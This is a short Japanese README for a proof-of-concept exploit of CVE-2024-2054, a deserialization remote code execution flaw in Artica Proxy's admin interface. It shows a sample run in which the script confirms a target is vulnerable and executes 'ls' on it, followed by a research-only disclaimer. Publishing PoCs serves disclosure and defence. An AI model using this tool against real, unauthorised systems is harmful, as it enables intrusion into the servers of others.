
CVE-2024-2054の概念実証エクスプロイト。Artica-Proxy管理Webアプリケーションの安全でない逆シリアル化RCEを示します。コマンド実行と脆弱性検証を含みます。
ARTICA PROXY 管理Webアプリケーション CVE-2024-2054 のエクスプロイト概念実証
$ python3 CVE-2024-2054.py
Enter url: https://8X.XX.XX.X4:9000
Vulnerable
enter command: ls
assets
index.html
wiz.upload.php
wiz.wizard.php
wiz.wizard.progress.php
このPOCは、純粋に学術研究と効果的な防御技術の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトの作成者・保守者は、ソフトウェア/POCの悪用について一切の責任を負いません。責任を持って使用してください。